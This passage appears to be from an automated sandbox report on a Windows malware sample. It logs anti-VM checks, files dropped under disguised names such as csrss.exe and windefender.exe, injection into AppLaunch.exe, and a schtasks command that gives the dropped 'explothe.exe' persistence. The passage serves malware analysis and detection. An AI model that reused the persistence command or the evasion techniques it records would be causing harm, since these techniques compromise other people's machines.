File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\powercfg.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\powercfg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3912 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 4620 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2892 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4620 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3912 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe
PID 2608 wrote to memory of 2464 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2A18.exe
PID 2464 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\2A18.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe
PID 1564 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe
PID 3152 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe
PID 3532 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe
PID 2608 wrote to memory of 1696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2CD8.exe
PID 3920 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe
PID 2608 wrote to memory of 4444 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2DE3.bat
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2892 -ip 2892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 576

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1808 -ip 1808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe

C:\Users\Admin\AppData\Local\Temp\2A18.exe

C:\Users\Admin\AppData\Local\Temp\2A18.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\2CD8.exe

C:\Users\Admin\AppData\Local\Temp\2CD8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe

C:\Users\Admin\AppData\Local\Temp\2DE3.bat

"C:\Users\Admin\AppData\Local\Temp\2DE3.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1696 -ip 1696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 912 -ip 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4948 -ip 4948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 540

C:\Users\Admin\AppData\Local\Temp\30C2.exe

C:\Users\Admin\AppData\Local\Temp\30C2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4112 -ip 4112

C:\Users\Admin\AppData\Local\Temp\3160.exe

C:\Users\Admin\AppData\Local\Temp\3160.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EBC.tmp\2EBD.tmp\2EBE.bat C:\Users\Admin\AppData\Local\Temp\2DE3.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 388

C:\Users\Admin\AppData\Local\Temp\37C9.exe

C:\Users\Admin\AppData\Local\Temp\37C9.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8d7b946f8,0x7ff8d7b94708,0x7ff8d7b94718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

